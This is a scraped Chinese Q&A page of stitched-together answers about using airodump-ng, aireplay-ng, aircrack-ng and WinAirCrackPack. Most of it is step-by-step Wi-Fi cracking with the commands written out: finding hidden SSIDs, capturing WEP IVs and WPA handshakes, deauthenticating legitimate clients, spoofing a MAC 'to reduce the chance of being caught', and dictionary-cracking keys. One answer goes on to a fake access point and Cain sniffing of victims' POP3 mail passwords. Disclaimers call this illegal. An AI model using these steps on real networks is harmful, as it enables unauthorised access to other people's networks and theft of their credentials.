- 苏萦
-
先说明下,破解无线网络的密码是可行的,但是是违法的,所以本贴的宗旨是提醒大家注意自己的无线网络安全。也希望大家不要利用本贴的方法干违法犯罪的事情!!!!基于此理由,我没有提供所用到的软件的下载,请大家谅解
步骤/方法
下载以下软件:
1、WinAirCrackPack工具包(WinAirCrackPack工具包是一款无线局域网扫描和密钥破解工具,主要包括airodump和aircrack等工具。它可以监视无线网络中传输的数据,收集数据包,并能计算出WEP/WPA密钥。我们用它来抓包和暴力破解密码)
2、Network Stumbler(无线网络信号搜索软件,可以搜索到隐藏了SSID的AP。用来搜索周围区域内的无线信号)
下面进入实战:
1、安装好无线网卡的驱动并禁用或者取下机器上的其它的无线网卡。
2、安装Network Stumbler软件,打开Network Stumbler,等几分钟后就可以看见所有的区域中工作中的无线AP,记录下MAC地址,SSID,信道(chan),是否加密(Encryption)[如果未加密就不需要破解了]。
3、下面再解压缩下载下来的WinAirCrackPack工具包。可以看到如下文件:
4、运行里头的airodump.exe,选择相应的网卡,输入对应无线网卡前的序号,例如我的是13。
5、输入o或者a选择网卡芯片类型,根据你的芯片类型选择,如果是使用兼容驱动的话选择a。再选择搜索频段,输入0是代表所有频段都检测的意思。接下来会提示你输入一个保存文件,这样该工具会把所有sniffer下来的数据包放到这个文件中。随便建立一个就好了。
6、only write wep ivs是否只检测WEP加密数据包,我们选择“Y”即可。
7、如果出现下图的结果,那么说明你的网卡驱动不支持此程序,同时会自动打开浏览器让你选择合适的驱动。
8、在安装好合适的驱动后会出现下图:
9、当统计的数据包比较多的时候,就可以自动分析出无线网络对应的SSID号和无线设备的MAC地址以及无线速度,发射频段和是否加密,采用何种方式加密了。
10、我们成功的实现了通过airodump找到没有开启SSID广播功能的无线网络对应的SSID号,所以说仅仅报着将SSID号隐藏并修改默认名字是不能阻止非法入侵者连接无线网络的。不管你是否开启SSID广播,我们都可以通过无线网络的sniffer工具来找出你的真实SSID名称。然后再对照第二步中获得的MAC地址和SSID是不是正确。
不过有一点要特别注意,那就是是否能够破解SSID名称是建立在airodump搜集到足够的数据包基础上的,也就是说也可能你的无线路由器开着,但是没有任何无线网卡和他通讯,这样airodump是无法检测到任何无线数据包并进行分析破解的。
11、再运行WinAirCrackPack工具包里面的winaircrack.exe程序。
12、在左边找到general,接下来点GENERAL界面中下方的click here to locate capture file...,让我们选择一个捕获文件。
13、这个文件就是上面所提到的airodump保存下来的数据统计文件,前面已经为其起了一个名字叫softer了,那么我们到airodump.exe所在文件夹中找到softer.cap文件,这个文件就是捕获文件。
14、回到general界面,在encryption type处选择WEP。
15、在左边点WEP,在WEP设置标签中先检测64位密文,key index保持自动AUTO。因为大部分用户在设置无线路由器WEP加密时都选择了最简单的64位密文,他也是破解所需时间最短的。
16、设置完毕点右下角的“aircrack the key...”按钮,winaircrack会自动根据softer.cap中保存的统计信息进行分析,暴力破解WEP密文。
17、由于采取的是暴力破解方法,所以花费的时间会比较多,大概需要几个小时甚至更多的时间来破解一个64位的WEP密文。当发现WEP密文后会显示出内容,如下图就能够发现出WEP加密信息为1111122222。
- Mugen-Hive
-
万能钥匙
相关推荐
airodump-ngstation没有
可能是因为当前没有客户端连接你的要破解的WiFi。Airodump-ng是用来抓包的,尤其适合为破解WEP收集IVs(初始向量),再用这些IVs来破解密码。另外,如果我们的电脑连接有GPS定位装置,那么airodump-ng则能够定位到它所找到的接入点的位置坐标。airodump-ng也能将接入点和客户端的信息写入文件中。在使用airodump-ng之前,我们可先用airmon-ng列出检测到的无线接口。另外,不建议同时使用Kismet和airodump-ng。2023-08-09 19:05:501
airodump-ng 扫描半天为何Beacons、#Data、CH等结果都没数据?
您好,对于你所遇到的问题,我很高兴能为你提供帮助,以下是我的个人看法,希望能帮助到你,若有错误,还望见谅!。airodump需要输入[动作指令+目标频道+储存文件名+所用监听端口],然后还需要新开cmd窗口,使用aireplay进行虚拟发包,当目标AP有数据返回时airodump才会有数据变化,显示有否抓到握手包。详细指令参数在各个功能里输入--help查看airodump-ng –channel number -w filename 127.0.0.1:666aireplay-ng -0 1 -a 目标AP"s MAC 127.0.0.1:666因为用CV,aircrack基本不怎么用,不过CV比air少很多功能,aircrack是跑字典破密,serv和odump合一起就是调用网卡+监听,eplay就是和backtrack里的虚拟发包攻击一样【这可以在目标AP没有客户端在线的情况下,强迫目标返回数据以便抓到可能的密码】。http://www.2cto.com/Article/201310/251112.html非常感谢您的耐心观看,如有帮助请采纳,祝生活愉快!谢谢!2023-08-09 19:05:571
Kali Linux怎么用airodump-ng得到握手包
建议楼主用aircrack-ng工具包获取握手包。使用方法:1、下载aircrack-ng工具包。2、终端里输入 sudo airomon-ng stat wlan0 启动数据监控模式。3、终端里输入 sudo airodump -w wpa mon0 ( 此时监控端口应该为 mon0 ,DATA保存到以wpa命名的文件中了)。4、依次:网络连接图标->点鼠标左键->鼠标移到要抓取握手数据包的AP上面点左键->。5、这时AP会提示你填入密码,随便填8个数字或字母进去,然后点击连接。6、现在可以看到网络连接正在尝试连接无线AP,回头看下步骤3的终端,DATA已经变为4个了。7、再打开一个新的终端,输入 sudo aircrack-ng wpa*.cap 会看到里面有一个握手包了。不要点 stop 如果点了stop,握手包就会丢失 。。获得握手包后,bini提示你跑字典,你点否,bini显示握手包路径,然后去找就可以了希望你成功,不过握手包不是问题,关键是你能否跑出密码来,这是国际难题。。。2011-08-14 Beini-1.2.3--- FeedingBottle 更新至3.2.1:修复桌面鼠标右键菜单无法运行程序的错误。--- 增加驱动和固件包 "x_rtl8188ru_20110812.tce",支持Realtek8188RU。--- 删除: "x_ath9k_htc_compat-wireless-2.6.38-rc4-1.tce","firmware.tcz"。--- 提示:本版本针对 Realtek8188RU 芯片开发,非此芯片的用户不建议使用。在无客户端进行伪连接操作时,请使用暴力伪连接方式,即:"Fake Auth(by force)",而不是普通的"Fake Auth(-1)"。2023-08-09 19:06:061
airodump-ng linux下怎样抓包
Aircrack-ng系列工具也有Windows 平台版本,但是本人的小黑的始终不能在win下抓包,所以只能 弃 Windows 从Linux 了,另外 Windows 下扫描到的 AP 也比 Linux 下少了很多。其实 Windows 并不完整的支持 TCP/IP 协议族,有些协议Windows 直接丢弃不用。网络本来从一开始就是 Unix 的天下,Windows 只是在后来加入了网络的功能。 Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个: airmon-ng 处理网卡工作模式 airodump-ng 抓包 aircrack-ng 破解 aireplay-ng 发包,干扰 另外还要用到以下 linux 命令: ifconfig 查看修改网卡状态和参数 macchanger 伪造 MAC iwconfig 主要针对无线网卡的工具 (同 ifconfig) iwlist 获取无线网络的更详细信息 另外还有其他的 linux 基本命令,我就不提示了。 具体破解步骤: 1. 修改无线网卡状态:先 dow 2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能 3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡 4. 修改无线网卡状态: up 5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标 6. 监听抓包:生成 .cap 或 .ivs 7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包 8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解Crack Mode一共有5种请酌情使用还有网卡不一定是ath1也有可能是wifi0,ath0等等ifconfig -aifconfig -a ath0 upairmon-ng start wifi0 6airodump-ng --ivs -w 目标路由器IVS文件 -c 6 ath1airodump-ng ath1aireplay-ng -1 0 -e 目标路由器SSID -a 目标MAC -h 本机MAC ath1----------- -2 Crack Mode-----------aireplay-ng -2 -p 0841 -c ffffffffffff -b 目标MAC -h 本机MAC ath1----------- -3 Crack Mode-----------aireplay-ng -3 -b 目标MAC -h 本机MAC ath1----------- -4 Crack Mode-----------aireplay-ng -4 -b 目标MAC -h 本机MAC ath1packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArpaireplay-ng -2 -r MyArp -x 256 ath1----------- -5 Crack Mode-----------aireplay-ng -5 -b 目标MAC -h 本机MAC ath1packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArpaireplay-ng -2 -r MyArp -x 256 ath1-----------Crack Key-----------aircrack-ng -n 64 -b 目标MAC 目标路由器IVS文件-01.ivs—————————————————————————————— 下面详细介绍一下各个命令的基本用法(参照命令的英文说明) 1. ifconfig 用来配置网卡,我们这里主要用来 禁用和启用 网卡: ifconfig ath0 down ifconfig ath0 up 禁用一下网卡的目的是为了下一步修改 MAC 。 2.macchanger 用来改变网卡的 MAC 地址,具体用法如下: usage: macchanger [options] device -h 显示帮助 -V 显示版本 -s 显示当前MAC -e 不改变mac,使用硬件厂商写入的MAC -a 自动生成一个同类型的MAC,同厂商的 -A 自动生成一个不同类型的MAC,不同厂商的 -r 生成任意MAC -l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品 -m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。 3.airmon-ng 启动无线网卡进入 Monitor 模式, useage: airmon-ng <start|stop|check> <interface> [channel] <start|stop|check>启动,停止,检测 <interface>指定无线网卡 [channel] 监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了 4.iwconfig 专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。 useage:iwconfig interface [options] [essid{NN|ON|OFF}] 指定essid号 开启关闭 [nwid{NN|on|off}] 指定网络id号 开启关闭 [mode {managed|ad-hoc|....}] 指定无线网络工作模式/类型 [freq N.NNNN[K|M|G]] 指定工作频率 [channel N] 指定频道 [ap {N|off|auto}] 指定AP号 关闭/自动 [sens N] sens 号 [nick N] nick 号 [rate {N|auto|fixed}] 速率控制 [rts {N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了 [frag {N|auto|fixed|off}] 碎片控制 [enc {NNNN-NNNN|off}] 范围 [power {period N|timeout N}] 电源 频率/超时 [retry {limit N|lifetime N}] 重试 限次/超时 [txpower N{mw|dBm}] 功率 毫瓦/分贝 [commit] 处理 5.iwlist 主要用来显示无线网卡的一些附加信息,同上 useage: iwlist [interface] options scanning 扫描 frequency 频率 channel 频道 bitrate 速率 rate 速率 encryption 加密 key 密钥 power 电源 txpower 功率 ap ap accespoints ap peers 直连 event 事件 6.airodump-ng 抓包工具,我最喜欢用的,详细用法如下: usage: airodump-ng <options> <interface>[,<interface>,...] Options: --ivs :仅将抓取信息保存为 .ivs --gpsd :使用 GPSd --write <prefix> :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分 -w :同 --write --beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的 --update <secs> :显示更新延迟,没有用过 --showack :显示ack/cts/rts状态,还是那句,不知道rts就不用看了 -h :隐藏已知的,配合上面的选项使用 -f <msecs> :跳频时间 --berlin <secs> :无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻译的都会有出入,这是我的理解.(mhy_mhy注) -r <file> :从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵 Filter options: --encrypt <suite> : 使用密码序列过滤 AP --netmask <netmask> : 使用掩码过滤 AP --bssid <bssid> : 使用 bssid 过滤 AP -a : 过滤无关的客户端 默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作: --channel <channels>:指定频道 --band <abg> :制定带宽 -C <frequencies> :指定频率MHz --cswitch <method> : 设置频道交换方式 0 : FIFO (default) 先进先出(默认) 1 : Round Robin 循环 2 : Hop on last 最后一跳 -s : 同上 --help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文 7.aireplay-ng2023-08-09 19:06:141
请教,AP信号找到,但是为什么用airodump抓不到包啊??求解啊
同学你好 我是Linux的系统 在终端下运行的Aircrack-ng 监听模式无法调用 我的是BCM43132型集成网卡 网卡不支持监听模式 所以显示监听模式打开了以后是抓不到包的 可能你与我有同样的问题 可以尝试换个网卡usb重新试试2023-08-09 19:06:232
求BT3高手帮忙,airodump无法启动
请先确认eth0为你的已经打开监听的无线网卡,可运行 ifconfig -a 找到你的无线网卡的名称,可能为eth0,eth1...或是wlan0,wlan1...,比如你的是eth0,然后 打开监听,airmon-ng start eth0, 返回的信息里会告诉你已经设置成功,名称为mon0,mon1,mon...再新建一个终端窗口,airodump-ng -w 123 mon0 。。。试试看看是否依然有报错信息,如果是,则可能网卡驱动没有安装好,或是你的网卡不支持监听功能。2023-08-09 19:06:301
我的airodump软件有问题
这是因为你的无线网卡驱动和airodump不兼容,须要更新驱动。无线网络密码破解方法2009-03-24 14:55无线网络密码破解方法需要WinAircrackPack该工具包是一个无线工具的组合包,包括WinAircrack.exe,wzcook.exe,airdecap.exe以及airodump.exe四个程序,这些程序各有各的用。SSID号发现工具就是airodump.exe。对付 SSID影藏第一步:解压缩下载的工具包,运行里头的airodump.exe第二步:选择相应的网卡,输入对应无线网卡前的序号第三步:输入o或者a选择网卡模式,第四步:选择搜索频段,输入0是代表所有频段都检测的意思。第五步:接下来会提示你输入一个保存文件,这样该工具会把所有sniffer下来的数据包放到这个文件中第六步:only write wep ivs是否只检测WEP加密数据包,我们选择“Y”即可。第七步:这时会出现一个提示,大概意思就是说目前驱动还不支持,无法进行sniffer的操作。同时浏览器会自动转到一个页面,我们可以通过这个页面下载兼容驱动程序,升级我们的无线网卡让sniffer工具——airodump.exe可以顺利运行(2)下载无线网卡新驱动: 要想下载合适的无线网卡新驱动就需要到前面提到的那个跳转页面了。第一步:打开的页面地址为http://www.wildpackets.com/support/product_support/airopeek/hardware,我们通过这个地址下载适合自己网卡的可以使用airodump的驱动。第二步:在搜索设备页面中选择自己无线网卡的品牌和型号。笔者选择tp-link的所有无线产品进行查询,看看应该下载哪个驱动第三步:在查询结果页面中我们可以看到自己的网卡应该使用该站点提供的AR5005G驱动来使用airodump四步:再次返回http://www.wildpackets.com/support/product_support/airopeek/hardware页面,你会在该页内容上看到关于该驱动所兼容的atheros卡型号,里面会提到ar5005,虽然我们的是ar5005g但是可以使用。点该页面下方的the wildpackets atheros wireless driver v4.2链接进行下载即可第五步:下载wildpackets atheros wireless driver v4.2驱动到本地硬盘。第六步:打开后里面有三个文件,我们的无线网卡升级工作就要靠这三个文件。(3)安装无线网卡新驱动: 之前下载的wildpackets atheros wireless driver v4.2压缩包里的三个文件就是我们安装驱动的主角。第一步:在桌面网上邻居图标上点鼠标右键,并选择属性。第二步:在自己的无线网卡对应的本地连接上点鼠标右键,并选择属性。第三步:在无线网络连接属性窗口中的“常规”标签下点网卡信息旁边的“配置”按钮。第四步:在“驱动程序”标签中点“更新驱动程序”按钮。第五步:系统将出现硬件安装向导,我们选择“从列表或指定位置安装(高级),然后点“下一步”按钮第六步:然后选择“不要搜索,我要自己选择要安装的驱动程序”,点“下一步”按钮继续。七步:由于之前我们安装的驱动是*****无线网卡的官方驱动,所以系统默认会找到相应的驱动,我们不选择他们,点“从磁盘安装”。第八步:通过“浏览”按钮找到我们下载并解压缩的wildpackets atheros wireless driver v4.2文件保存目录。第九步:选择atheros ar5005g cardbus wireless network adapter,点“下一步”继续第十步:在安装驱动过程中会出现兼容性提示,我们点“仍然继续”即可。第十一步:系统复制必须文件到本地磁盘第十二步:完成硬件更新向导,我们的TP-LINK无线网卡现在已经变成了atheros ar5005g无线网卡了,这样才能够使用airodump这个无线网络sniffer工具。四、总 结:由于WEP破解的准备工作比较多,已经成功的将自己的网卡进行了更新驱动工作,这也是WEP加密破解的关键,开始 轻松破解无线网络WEP一、使用airodump抓取无线网络数据包并破解SSID名称:不管是找出已经禁用了SSID号广播的无线网络还是进行WEP解密工作,我们首先要做的就是通过无线网络sniffer工具——airodump来监视无线网络中的数据包。第一步:打开文章中下载的winaircrackpack压缩包解压缩的目录。第二步:运行airodump.exe程序,这个就是我们的sniffer小工具,他的正常运行是建立在我们无线网卡已经更新驱动的基础上。第三步:这时你会发现显示的信息和安装驱动前已经不同了,我们的***网卡名称已经变为13 atheros ar5005g cardbus wireless network adapter,也就是说他成功更新为与atheros兼容的硬件了。我们输入其前面的数字13即可。第四步:接下来是选择无线网卡的类型,既然说了是与atheros相兼容的,所以直接输入“a”进行选择即可。第五步:上面文章中提到了已经把无线网络的SSID广播功能取消了,这样我们假设还不知道该无线设备使用的哪个频段和SSID号。在这里输入0,这样将检测所有频段的无线数据包。实际上要想知道一个无线网络使用的频段是非常简单的,可以使用无线网卡管理配置工具,就像上文提到的那样,可以知道该无线网络使用的速度和频段,但是无法检测出SSID号。第六步:同样输入一个保存数据包信息的文件,例如输入softer。这样可以把检测到的数据包以及统计信息一起写到这个文件中,并为使用其他工具提供基础保证。第七步:是否只收集wep数据信息,我们点N”。这样将检测网络中的所有数据包不只WEP加密数据。第八步:最后airodump会自动检测网络中的所有频段,对无线网络中的无线数据包进行统计和分析。第九步:当统计的数据包比较多的时候,就可以自动分析出无线网络对应的SSID号和无线设备的MAC地址以及无线速度,发射频段和是否加密,采用何种方式加密了,是不是非常神气?例如设置的无线网络SSID号为softer,刚开始图7中统计时还没有检测出来,当数据达到一定数量后例如DATA处为15651时就可以看到ESSID号即SSID号为softer了。至此我们成功的实现了通过airodump找到没有开启SSID广播功能的无线网络对应的SSID号,所以说仅仅报着将SSID号隐藏并修改默认名字是不能阻止非法入侵者连接无线网络的。不管你是否开启SSID广播,我们都可以通过无线网络的sniffer工具来找出你的真实SSID名称。不过有一点要特别注意,那就是是否能够破解SSID名称是建立在airodump搜集到足够的数据包基础上的,也就是说也可能你的无线路由器开着,但是没有任何无线网卡和他通讯,这样airodump是无法检测到任何无线数据包并进行分析破解的。笔者在写本文进行的实验环境也是如此,那另外一块TP-LINK无线网卡510G安装在一台联想笔记本上并不停的通过无线路由器进行BT下载来保持总是不断有无线数据传输,这样才可以加快破解进程。另外当数据包没有收集足够多的情况下,airodump会出现错误信息,例如本来是WEP加密方式的无线网络,可能会检测为WPA。用户只需要多等些时间让airodump收集足够多的数据就可以保证显示结果的真实性了。二、使用WinAircrack破解WEP密文:虽然我们可以通过airodump来检测无线网络的基本信息,包括发射频段,无线网络的SSID名称,无线速度等。但是对于那些使用WEP加密了的无线网络就无能为力了,即使我们知道了无线网络的SSID号如果没有WEP加密密文的话,依然无法连接到该网络。不过airodump收集到的信息也是非常宝贵的,我们可以通过另外一个工具来分析出WEP密文。该工具的名称是WinAircrack,当然在用WinAircrack破解airodump收集到的信息前一定保证airodump收集的信息量要大,信息越多破解越不容易出问题,而且破解成功所需时间越短。第一步:打开下载的压缩包,运行里面的winaircrack.exe程序。第二步:在左边找到general,接下来点GENERAL界面中下方的click here to locate capture file...,让我们选择一个捕获文件。第三步:这个文件就是上面所提到的airodump保存下来的数据统计文件,第九步中已经为其起了一个名字叫softer了,那么我们到airodump.exe所在文件夹中找到softer.cap文件,这个文件就是捕获文件。第四步:回到general界面,在encryption type处选择WEP。第五步:在左边点WEP,在WEP设置标签中先检测64位密文,key index保持自动AUTO。因为大部分用户在设置无线路由器WEP加密时都选择了最简单的64位密文,他也是破解所需时间最短的。第六步:设置完毕点右下角的“aircrack the key...”按钮,winaircrack会自动根据softer.cap中保存的统计信息进行分析,暴力破解WEP密文。第七步:由于采取的是暴力破解方法,所以花费的时间会比较多,大概需要几个小时甚至更多的时间来破解一个64位的WEP密文。当发现WEP密文后会显示出内容.不过在实际操作过程中需要的时间会比较长,特别是当WEP密文设置的比较复杂时,例如使用多个数字或者增加加密位数达到128位等。另外通过airodump来收集无线数据传输包也是关键,也许对方开着路由器但并没有和网卡进行大流量数据传输,这样即使你开启airodump收集了几个小时,都可能出现无法获得足够数据包问题。仅仅是为了和大家交流,希望大家不要使用本文介绍的方法去入侵别人的无线网,大家能够明白WEP加密也不是百分之百安全,所以应该尽量使用WPA安全加密方式。2023-08-09 19:06:371
airodump打开显示没有探测到适配器是怎么回事?
适配器是英语Adapter/adaptor的汉语翻译。适配器就是一个接口转换器,它可以是一个独立的硬件接口设备,允许硬件或电子接口与其它硬件或电子接口相连,也可以是信息接口。比如:电源适配器、三角架基座转接部件、USB与串口的转接设备等。 在计算机中,适配器通常内置于可插入主板上插槽的卡中(也有外置的)...卡中的适配信息与处理器和适配器支持的设备间进行交换。 ................还有我不会英语2023-08-09 19:06:431
Aircrack-ng工具airodump-ng mon0不能监听
你用的无线网卡芯片是 rtl8188ee 驱动,这个驱动在kali中是支持的,但NG套件不支持此驱动!结果:请更换无线网卡。攻略:选无线网卡一定要选3070与8187的芯片,除此之外,其它所有芯片都不能正常在你的情况下使用。至于这两个芯片的具体型号产品我想不用我列出,你自己能找到,很多的。2023-08-09 19:06:511
握手包的抓取方法
握手包的抓取需要在用户正在拨号时才行。 一般的方法是,在抓包的同时,用deauth攻击,让已经登录的用户断线,然后用户再次登录时就可以抓握手包了。 不要一直攻击,否则合法用户连不上。当pwr显示的合法客户端的数值变为0时,表示他已经掉线了。 这个过程需要多进行几次,得亲自盯着,靠全自动软件是不行的。 sudo ifconfig wlan0 sudo airmon-ng start wlan0 sudo airodump-ng -w test mon0 -c 13 在抓包的同时进行注入攻击 sudo aireplay-ng -0 10 -a bssid mon0 抓到握手包后,在airodump显示屏幕的右上角回有显示的,然后可以关闭无线网卡了,在本地用aircrack-ng,挂上字典,进行wpa-psk的破解。2023-08-09 19:07:001
如何捕获WPA四次握手包?
一、操作环境:1、操作系统ubuntu 2、aircrack-ng工具包二、步骤如下:1、确保开机后无线网卡没有自动连接AP网络连接图标>鼠标右键>编辑连接>,把无线里面的自动连接AP全部删除2、终端输入sudo airomon-ng stat wlan0启动监控模式3、终端输入sudo airodump -w wpa mon0 ( 此时监控端口为mon0,DATA保存到以wpa命名的文件中) 这时看到要抓包的AP DATA为0 4、网络连接图标>点鼠标左键>鼠标移到要抓取握手包的AP上面点左键> 5、这时AP要填入密码,随便填几个数字进去(如:1234578),然后点连接6、这时可以看到网络连接正在尝试连接AP,回头看下步骤3的终端,DATA变为4个了7、再开一个终端,输入sudo aircrack-ng wpa*.cap看是不是里面有一个握手包了注:这个方法只能在刚开机进入系统时用,而且每次只能使用一次,如果要得到别的WPA加密的AP的握手包只能重复步骤1,然后重启ubuntu,具体原因不明。2023-08-09 19:07:252
kali用airodump抓到的握手包在哪个文件里
你没有写入文件,-w或者--write后面必须跟上文件名称才可以保存到文件。2023-08-09 19:07:341
隐藏wifi ssid获取
最近玩一些wifi的game,意识到隐藏wifi的速度可能会好一些,索性玩一玩 像这些带有length:xx的就是隐藏wifi,名称我也不知道,不过没关系 可以查看下自己的网卡Mac(上次重装系统后好像变了,神奇) 索性随便选取一条 会显示如下,下面出来BSSID才可以识别隐藏wifi的ssid 然后 多尝试几次,然后对方的ssid就出来了,剩下就很简单了 airodump-ng和aireplay-ng需要同时打开,如果失败的话多aireplay-ng多执行几次 airodump-ng下边有ssid才可以,否则不行(可能是实验问题)2023-08-09 19:07:401
mac磁盘工具容器disk3是什么
disk3是一款无线局域网扫描和密钥破解工具的软件,disk3这款软件主要包括airodump和aircrack等等工具,可以监视无线网络中传输的数据,收集数据包,并能计算出wep和wpa密钥,需要选用具有wep和wpa加密功能的无线路由器,带有迅驰无线网卡的笔记本电脑就可以了。2023-08-09 19:07:471
您好,如何破解网络tp-link的密码的?
破解无线路由的软件:WINAIRCRACKPACK迅驰密钥五分钟破解法 1、破解软件简介 WinAirCrackPack工具包是一款无线局域网扫描和密钥破解工具,主要包括airodump和aircrack等工具。它可以监视无线网络中传输的数据,收集数据包,并能计算出WEP/WPA密钥。 2、实验环境系统组成 2.1 硬件环境 选用具有WEP和WPA加密功能的无线路由器或AP一台 带有迅驰无线网卡的笔记本电脑两台(分别定义为STA1和STA2,作为合法无线接入用户) 抓包无线网卡一块 ü笔记本电脑一台(定义为STA3,作为入侵者) 2.2 软件环境 入侵者STA3 :WinAirCrackPack工具包, 注意:STA3要开启在控制面板->管理工具->服务中开启Wireless Zero Config服务。 3、实验拓扑图 4、配置无线路由器(根据实际网络环境进行配置) (1)STA1连接上无线路由器(默认未加密)。右键单击屏幕下的图标,选择“查看可用的无线网络”,弹出如图1所示的窗口。 其中显示有多个可用的无线网络,双击TP-LINK连接无线路由器,一会儿就连接成功。 (2)打开IE浏览器,输入IP地址:192.168.1.1(无线路由器默认局域网IP地址)。 (3)登录无线路由器管理界面(用户名:admin,密码:admin)。 单击界面左侧的“网络参数”下的“LAN口设置”选项,设置“IP地址”为192.168.1.8并保存,如图4所示。 (4)打开IE浏览器,输入IP地址:192.168.1.8,重新登录无线路由器管理界面(注意本实验选择TP-LINK无线路由器,其他品牌产品如CISCO等均有类似配置选项),单击界面左侧的“无线设置”下的“基本设置”选项。 1)选择“模式”为“54Mbps(802.11g)”; 2)选择“密钥格式”为“ASCII码”; 3)选择“密钥类型”为“64位”; 4)设置“密钥1”为“pjwep”; 5)单击“保存”。 (5)当无线路由器设置好WEP密钥后,STA1需要重新连接上无线路由器(输入的密钥与无线路由器设置的密钥相同),一会儿就连接成功。 (6)打开IE浏览器,输入IP地址:192.168.1.8,重新登录无线路由器管理界面,单击界面左侧的“DHCP服务器”下的“DHCP服务”选项,单击“不启用”并保存,如图8所示,单击“系统工具”下的“重启路由器”对路由器进行重启。 5、破解WEP、WPA密钥的软件下载 STA3从网上下载用于破解密钥的软件,具体操作步骤如下: (1)在Google搜索页面中输入“WinAircrackPack下载”进行搜索,如图9所示。 点击上述页面中“安全焦点:安全工具-WinAircrackPack.zip”,弹出以下页面。 (2)单击“下载”保存该软件,可解压到本地磁盘的任何位置(以下我们解压到E盘根目录下为例)。 6、安装抓包无线网卡 注:用于抓包无线网卡的驱动采用Atheros v4.2.1,该卡必须采用Atheros AR5001, AR5002, AR5004, AR5005 或 AR5006芯片组,下表的网卡均可使用,本实验我们采用Netgear 的108M无线网卡(型号:WG511T)。 (1)在STA3笔记本上安装抓包无线网卡驱动。插入无线网卡,弹出如图11所示的窗口。选择“否,暂时不”,单击“下一步”。 (2) 选择“从列表或指定位置安装”,单击“下一步”。 (3)选择“不要搜索”,单击“下一步”。 (4)单击“从磁盘安装”,在弹出的窗口中单击“浏览”,选择E:WinAircrackPackatheros421@(目录下的net5211文件,单击“打开”,然后单击“确定”,单击“下一步”,在安装的过程中弹出如图15所示的窗口。 7、破解WEP密钥 (1)让STA1和STA2重新连接上无线路由器。 (2)在STA3笔记本电脑上运行airodump,该工具用来捕获数据包,按提示依次选择“16”:破解所用无线网卡的序号; “a”,选择芯片类型,这里选择atheros芯片; “6”,信道号,一般1、6、11是常用的信道号,选择“0”可以收集全部信道信息; “testwep”(该输入文件名可任意); “y”,破解WEP时候选择“y”,破解WPA时选择“n”。 (3)回车后,进入以下界面。 (4)当该AP的通信数据流量极度频繁(比如可以采用STA1与STA2对拷文件来产生数据流量),“Packets”所对应的数值增长速度就会越大。当大概抓到30万(如采用104位RC4加密需要抓到100万包)“Packets”时关闭airodump窗口,启动 WinAircrack。 (5)点击左侧的“General”进行设置,选择加密类型为“WEP”,添加捕获的文件(testwep.ivs)。 (6)点击左侧的“Advanced”进行设置,选择“Aircrack”所在的位置。 (7)全部设置完后,点击右下角的“Aircrack the key”按钮弹出以下窗口。 (8)选择要破解网络的BSSID(本实验选择“1”),回车得到最终WEP密钥。 8、破解WPA密钥 (1)修改无线路由器的加密类型和加密方法,并设置为WPA-PSK认证和TKIP加密方式。 (2)在STA3笔记本上运行airodump,该工具用来捕获数据包,按提示依次选择“16”,“a”,“6”,“testwpa”(该输入文件名可任意),“n”。 (3)回车后,进入以下界面 (4)让STA1重新连接上无线路由器,airodump将捕获一个无线路由器与STA1四次握手的过程。 (5)启动WinAircrack。 (6)点击左侧的“General”进行设置,选择加密类型为“WPA-PSK”,添加捕获的文件(testwpa.cap)。 (7)点击左侧的“Wpa”进行设置,选择一个字典文件(口令字典可下载:例如lastbit.com/dict.asp)。 (8)全部设置完后,点击右下角的“Aircrack the key”按钮弹出以下窗口,可知已经捕获到一次握手的过程。 (9)选择要破解网络的BSSID(本实验选择“2”),回车后经过几分钟的计算,最终得到WPA密钥。 9、破解密钥后对网络的危害一例(伪造AP) 一旦入侵者知道了无线网络的WEP或WPA密钥,就可以连接到本地局域网内,这样入侵者就享有与正常接入用户一样对整个网络访问的权限,进行深度攻击。入侵者可以利用IPBOOK,SuperScan 等类似这样的工具扫描局域网内的计算机,计算机里面的文件、目录、或者整个的硬盘驱动器能够被复制或删除,甚至其他更坏的情况诸如键盘记录、特洛伊木马、间谍程序或其他的恶意程序等等能够被安装到你的系统中,这样后果是非常严重的。 (1)简介 当WEP或WPA密码被破解后,入侵者可能用该密码和其他无线接入点(AP)构造一个假网络,当伪装AP的信号强于正常AP或用户靠近伪装 AP时,正常用户会很自然的接入到该假网络中,对于用户本身来说是感觉不到该网络的,就在用户正常收发邮件时,我们可以用类似CAIN这样的工具进行POP3、telnet等口令的破解等攻击。 (2)POP3口令破解 1)打开CAIN。 2)点击菜单栏“Configure”弹出以下窗口。 3)选择一个将用于抓包的网络适配器,点击“确定”,选择“ ”和“ ”,然后点击“ ”开始监控抓包。 4)正常用户开始收邮件,该软件可以对邮箱的登陆名和密码进行捕获。 (3)被破解后的危害 当黑客窃取了你的邮箱的用户名、密码、POP3服务器和SMTP服务器的IP地址后,就可以直接访问你的邮箱,你的邮件信息将完全暴露在黑客面前。 请大家仅出于学习目的使用本软件!2023-08-09 19:07:552
kali如何启用wlan0
kali启用wlan0在设置监听模式前先输入airmon-ngcheckkill结束进程,然后载入网卡airmon-ngstartwlan0网卡名,电脑会自动创建一个wlan0mon接口,建立监听airodump-ngwlan0mon即可。2023-08-09 19:08:011
airodump-ng mon0后 MB下面的54e.是什么啊
